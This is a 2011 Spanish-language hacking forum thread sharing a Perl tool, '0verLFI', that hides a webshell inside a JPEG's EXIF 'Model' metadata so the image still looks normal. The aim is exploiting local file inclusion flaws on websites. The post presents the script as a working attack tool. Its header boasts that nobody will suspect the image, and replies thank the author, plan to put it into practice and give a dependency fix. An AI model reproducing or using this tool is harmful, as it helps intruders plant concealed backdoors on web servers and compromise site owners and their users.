Página 1 de 1

LFI: Inyector de Webshells en imágenes

Publicado: 14 Ago 2011, 23:26
por Cagoendiez

Código: Seleccionar todo

####################################################
#          0verLFI v0.2 Coded by The X-C3LL        #       
####################################################
#  Se trata de una herramienta bastante sencilla   #
#  para inyectar una shell en una imagen JPEG      #
#  y que esta siga pudiendo ser visualizada        #
#  correctamente, de esta forma nadie sospecha.    #
#  Lo único que hace es meter la shell dentro      #
#  de los metadatos de la foto.                    #
####################################################
#             Gr33tz to Seth & CPH Comunity        #
####################################################
#          HTTP://0VERL0AD.BLOGSPOT.COM            #
####################################################



use Image::ExifTool;

print q(

+-----------------------------------+
   0verLFI v0.1 coded by The X-C3LL  

    Http://0verl0ad.blogspot.com  
+-----------------------------------+

);

die "[-]Usage: perl 0verLFI.pl <FILE> <IMAGE>\n" unless @ARGV == 2;

my $file = $ARGV[0];
my $jpeg = $ARGV[1];
print "[+]Image = $jpeg \n";
print "[+]Shell = $file \n";

open (HANDLE, $file);
@array = <HANDLE>;
my $string = join("\n", @array);


my $tool = Image::ExifTool->new();

$tool->ExtractInfo($jpeg);
$tool->SetNewValue("Model", $string);
$done = $tool->WriteInfo($jpeg);
Simplemente tienen que pasar la imagen a inyectar como argumento:
Imagen


Como podeis comprobar, tras modificar los metadatos la imagen continúa viendose perfectamente:



Imagen




Y si lo testeamos en un entorno local vulnerable veremos que funciona:


Imagen




Autor: The X-C3LL
Fuente: Foro Portal Hacker

Re: LFI: Inyector de Webshells en imágenes

Publicado: 16 Ago 2011, 12:58
por MichBukana
Gracias por traérnoslo.

Salu2!

Re: LFI: Inyector de Webshells en imágenes

Publicado: 16 Ago 2011, 16:52
por CyRuX
Gracias por la info.! lo pondre en practica. Ya que ahorita ando mas metido en esta rama.

Re: LFI: Inyector de Webshells en imágenes

Publicado: 17 Ago 2011, 11:16
por King
Buuufff, ese shell no lo sospecha nadie xd esta encryptado y todo xDD
buen aporte.

Re: LFI: Inyector de Webshells en imágenes

Publicado: 16 Sep 2011, 12:54
por 4n0nym0us
La herramienta no funciona bien del todo... cuando intentas agregar la shell dentro de unos metadatos que dicha imagen tiene borrados, se genera la imagen de nuevo pero la deja intacta, ni siquiera aumenta el tamaño.

Para que a todo el mundo se le ejecute sin fallos, deberán descargar la biblioteca de "libimage-exiftool-perl", que permite agregar metainformación en archivos multimedia.

Saludos 4n4les! ;)

Re: LFI: Inyector de Webshells en imágenes

Publicado: 18 Sep 2011, 23:22
por KHC
Algo similiar...
viewtopic.php?f=59&t=33798

Re: LFI: Inyector de Webshells en imágenes

Publicado: 22 Sep 2011, 06:02
por blasfemia
Gracias por la Info bro.!!!

Buen Aporte!!